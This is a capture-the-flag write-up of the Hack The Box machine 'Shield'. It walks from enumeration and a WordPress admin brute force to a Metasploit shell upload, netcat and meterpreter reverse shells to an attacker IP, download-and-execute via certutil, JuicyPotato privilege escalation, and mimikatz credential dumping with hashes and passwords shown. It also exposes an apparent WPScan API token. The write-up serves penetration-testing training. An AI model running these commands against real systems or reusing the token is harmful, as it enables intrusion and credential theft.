Shield

Last updated 2 years ago

Was this helpful?

Shield

HTB - Shield

nmap -T4 -A -p- 10.10.10.29

kali@kali:~$ nmap -T4 -A -p- 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDT
Nmap scan report for 10.10.10.29
Host is up (0.47s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds

Nessus scan for fun Start with sudo /etc/init.d/nessusd start and go to https://kali:8834

Enumerate HTTP

Ran sudo nikto -h http://10.10.10.29

kali@kali:~$ sudo nikto -h http://10.10.10.29
[sudo] password for kali: 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 17:16:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-04 18:12:15 (GMT-4) (3359 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~$ sudo nikto -h http://10.10.10.29/wordpress
[sudo] password for kali: 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 18:41:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ ERROR: Error limit (20) reached for host, giving up. Last error:                                                                                         
+ Scan terminated:  3 error(s) and 8 item(s) reported on remote host                                                                                       
+ End Time:           2020-05-04 19:11:11 (GMT-4) (1779 seconds)                                                                                           
---------------------------------------------------------------------------                                                                                
+ 1 host(s) tested

Visit http://10.10.10.29

Subdirectory brute force with gobuster: gobuster dir -u http://10.10.10.29/ -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt (other possible wordlist: /usr/share/wordlists/dirb/common.txt)

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/04 17:27:45 Starting gobuster
===============================================================
/wordpress (Status: 301)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/WordPress (Status: 301)
[ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/Wordpress (Status: 301)
===============================================================
2020/05/04 17:34:53 Finished
===============================================================

Wordpress install found at /wordpress/

Run wpscan:

wpscan --update
wpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g

Output:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Mon May  4 17:38:24 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.29/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |
 | [!] 18 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9864
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://fortiguard.com/zeroday/FG-VD-18-165
 |      - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9973
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9975
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10004
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10201
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10202
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10203
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10204
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47636/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10205
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10206
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mesmerize-companion
 | Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
 | Latest Version: 1.6.111
 | Last Updated: 2020-04-10T15:01:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 48

[+] Finished: Mon May  4 17:38:40 2020
[+] Requests Done: 27
[+] Cached Requests: 36
[+] Data Sent: 6.36 KB
[+] Data Received: 18.56 KB
[+] Memory used: 175.391 MB
[+] Elapsed time: 00:00:15

Enumerate Users: wpscan --url 10.10.10.29/wordpress/ --enumerate u

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Bruteforce login: wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Login found to be admin:P@s5w0rd! from last box. Go to http://10.10.10.29/wordpress/wp-login.php and login.
Searching for metasploit wordpress yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload

Exploit

sudo msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > set LPORT 443
msf > set payload php/meterpreter_reverse_tcp
msf > exploit

Upgrade to more stable shell:

wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
untar netcat-win32-1.12.zip
msf > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
sudo python3 -m http.server 80
msf > shell
> iwr -outf nc.exe http://10.10.14.173/nc.exe
nc -lvp 1234
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"

2nd way to upgrade (much better):
1. Change paylaod to download and execute
  set payload php/download_exec msf > set url http://10.10.14.173/shell.exe
2. Create exploit: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
3. Run server: sudo python3 -m http.server 80
4. Open up port to listen on:
  use exploit/multi/handler set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.15.117 set LPORT 443 run

Sysinfo:

sysinfo
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

Privilege Escalation ()

Find exploit:

Method 1: Priv esc suggester

search suggester
use 0
options
set session 1
run

Result:

0.29 - Collecting local exploits for x86/windows...
[*] 10.10.10.29 - 30 exploit checks are being tried...
[+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

Result: I tried ms16_032_secondary_logon_handle_privesc with x64 meterpreter after changing to x64 shell from 32 bit but did not work.

Method 2: Search for windows server 2016 privilege escalation exploit yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to

Method 3: More automated searchers. ** by rastamouse

sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1
msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"

Output:

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

Result: Not vulnerable

Trying :

wget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exe
msf shell > ex.exe --audit -a -o report -v

Trying :

wget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1
msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1
msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"

"Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack."
CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard

Manual Escalation

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80
msf > shell
msf > powershell
msf > iwr -outf js.exe http://10.10.14.173/JuicyPotato.exe

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.bat
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}

Automatic Escalation

msf > background
msf > search ms16_075
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf > set payload windows/meterpreter/reverse_tcp
msf > set session 1
msf > set lhost 10.10.14.173
msf > set dcom_port 1337
msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
msf > set lport 8464
msf > run

Result: Server username: NT AUTHORITY\SYSTEM

cd C:\Users\Administrator\Desktop
cat root.txt

Root Flag: 6e9a9fdc6f64e410a68b847bb4b404fa

Post Exploitation

Convert to x64 shell:

use post/windows/manage/archmigrate
set session 2
set IGNORE_SYSTEM true

Get passwords

load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords

Output:

Authentication Id : 0 ; 298603 (00000000:00048e6b)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 5/4/2020 10:20:27 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username : sandra
         * Domain   : MEGACORP
         * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username : sandra
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : sandra
         * Domain   : MEGACORP.LOCAL
         * Password : Password1234!
        ssp :
        credman :

Authentication Id : 0 ; 183955 (00000000:0002ce93)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 183792 (00000000:0002cdf0)
Session           : Service from 0
User Name         : wordpress
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:24 PM
SID               : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
